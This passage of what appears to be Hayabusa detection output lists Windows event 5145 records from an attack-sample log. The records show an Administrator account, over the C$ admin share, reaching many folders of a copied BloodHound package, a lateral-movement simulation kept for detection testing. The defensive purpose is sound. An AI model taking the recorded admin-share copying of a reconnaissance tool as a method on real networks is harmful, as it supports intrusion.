0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:24.458 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\core-js\fn\typed | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:24.458 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\core-js\fn\weak-map | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:24.458 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\core-js\fn\weak-set | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:24.458 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\core-js\library | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:24.468 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\core-js\library\core | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:24.468 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\core-js\library\es5 | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:24.468 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\core-js\library\es6 | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:24.478 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\core-js\library\es7 | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:24.478 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\core-js\library\fn | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:24.478 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\core-js\library\modules | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:24.518 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\core-js\library\stage | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:24.518 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\core-js\library\web | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:24.518 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\core-js\modules | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:24.558 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\core-js\modules\library | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:24.558 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\core-js\stage | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:24.558 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\core-js\web | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:24.558 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\core-util-is | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:24.568 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\core-util-is\lib | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:24.568 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\crc-32 | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:24.568 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\crc-32\bin | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:24.578 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\crc-32\types | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:24.578 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\dagre | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:24.578 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\dagre\dist | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:24.588 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\dagre\lib | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:24.588 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\dagre\lib\data | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:24.588 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\dagre\lib\order | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:24.588 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\dagre\lib\position | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:24.598 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\dagre\lib\rank | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:24.598 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\dagre\node_modules | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:24.598 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\dagre\node_modules\lodash | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:24.598 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\dom-helpers | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:24.608 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\dom-helpers\class | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:24.608 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\dom-helpers\events | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:24.608 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\dom-helpers\query | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:24.608 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\dom-helpers\style | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:24.608 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\dom-helpers\transition | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:24.618 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\dom-helpers\util | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:24.618 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\dot-prop | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:24.618 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\duplexer2 | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:24.618 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\electron-store | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:24.618 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\env-paths | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:24.628 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\eventemitter2 | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:24.628 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\eventemitter2\lib | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:24.628 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\exenv | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:24.628 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\exit-on-epipe | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:24.638 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\file-type | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:24.638 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\find-up | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:24.638 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\fontfaceobserver | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:24.638 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\fontfaceobserver\src | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:24.638 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\frac | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:24.648 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\fs.realpath | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:24.648 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\fstream | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:24.648 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\fstream\examples | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:24.648 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\fstream\lib | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:24.658 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: 